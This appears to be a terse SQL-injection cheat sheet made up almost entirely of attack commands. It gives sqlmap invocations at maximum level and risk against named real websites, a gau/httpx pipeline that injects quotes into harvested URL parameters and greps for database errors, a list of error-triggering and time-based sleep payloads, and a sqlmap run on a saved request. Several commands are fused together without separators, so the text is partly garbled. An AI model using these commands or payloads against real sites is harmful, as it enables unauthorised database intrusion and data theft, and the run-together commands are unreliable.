👑Find SQL Injection (CWE-89)
SQLMAP Command
sqlmap -u https://fics.nust.edu.pk/event/igs.php?id=6 --technique=BT --level=5 --risk=3 --threads=10 --dbms='MySQL' --batch --current-db --random-agentcat old_endpoints.txt | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"echo "https://www.tgophoto.com" | gau | uro | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"Check Error
?id=2' ----> Create Error
?id=2'' ----> Create Error
?id=2%5c ----> Create Error
?id=2''' ----> Create Error
?id=2'''' ----> Create Error
?id=2" ----> Create Error
?id=2"" ----> Create Error
?id=2'\ ----> Create Error
?id=2"\ ----> Create Error
?id=2'/ ----> Create Error
?id=2"/ ----> Create Error
?id=2%bf%5c' ----> Create Error
?id=2%bf%5c" ----> Create Error Check Blind
?id=(select*from(select(sleep(20)))a)----------------------------------------------------------------
python3 sqlmap.py -u --dbs --risk=3 --level=5 --random-agent --batch
----------------------------------------------------------------
sqli or not ? so it was POST /xxx.php HTTP 1.1 with multipart params > .php 
should I try sqli ? > replaced one param with * > saved as r.txt cmd :
should I try sqli ? > replaced one param with * > saved as r.txt cmd :python3 sqlmap.py -r r.txt --level 5 --risk 3 --dbs --time-sec=15 --hostname Last updated